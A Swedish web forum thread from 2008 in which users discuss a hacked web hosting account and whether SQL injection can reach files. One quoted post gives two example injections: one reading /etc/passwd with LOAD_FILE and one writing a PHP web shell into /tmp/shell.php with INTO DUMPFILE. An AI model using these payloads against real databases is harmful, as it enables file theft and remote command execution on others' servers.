Kom ihåg mig?
Home Menu

Menu


Mitt andra webbhotell hackat efter Proinet

 
Ämnesverktyg Visningsalternativ
Oläst 2008-02-28, 14:30 #21
tartareandesire tartareandesire är inte uppkopplad
Supermoderator
 
Reg.datum: Jan 2004
Inlägg: 11 585
tartareandesire tartareandesire är inte uppkopplad
Supermoderator
 
Reg.datum: Jan 2004
Inlägg: 11 585
Citat:
Ursprungligen postat av SimonP
Citat:
Ursprungligen postat av tartareandesire
SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).
Ifall det finns tillräckliga rättigheter på databasen kan man både läsa och skapa filer med SQL injektioner.
T.ex för att läsa en fil:
SELECT LOAD_FILE(/etc/passwd);
Skapa:
SELECT ?php system(_GET[cmd]); ? INTO DUMPFILE /tmp/shell.php;
Mjo, iofs, men jag tror väl de flesta webbhotell inte tillåter det på delade burkar?
__________________
Full-stack developer, free for smaller assignments
tartareandesire är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-02-28, 15:15 #22
clirres avatar
clirre clirre är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Nov 2005
Inlägg: 1 035
clirre clirre är inte uppkopplad
Har WN som tidsfördriv
clirres avatar
 
Reg.datum: Nov 2005
Inlägg: 1 035
Vad bör man ha för rättigheter på kataloger och filer? Jag har aldrig ändrat grundinställningen på dem men blir lite osäker nu när de ändrats av hackermiffot och jag själv ändrat tillbaka.
clirre är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-02-28, 16:34 #23
allstars allstars är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Apr 2006
Inlägg: 2 126
allstars allstars är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Apr 2006
Inlägg: 2 126
nej
allstars är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 05:51.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017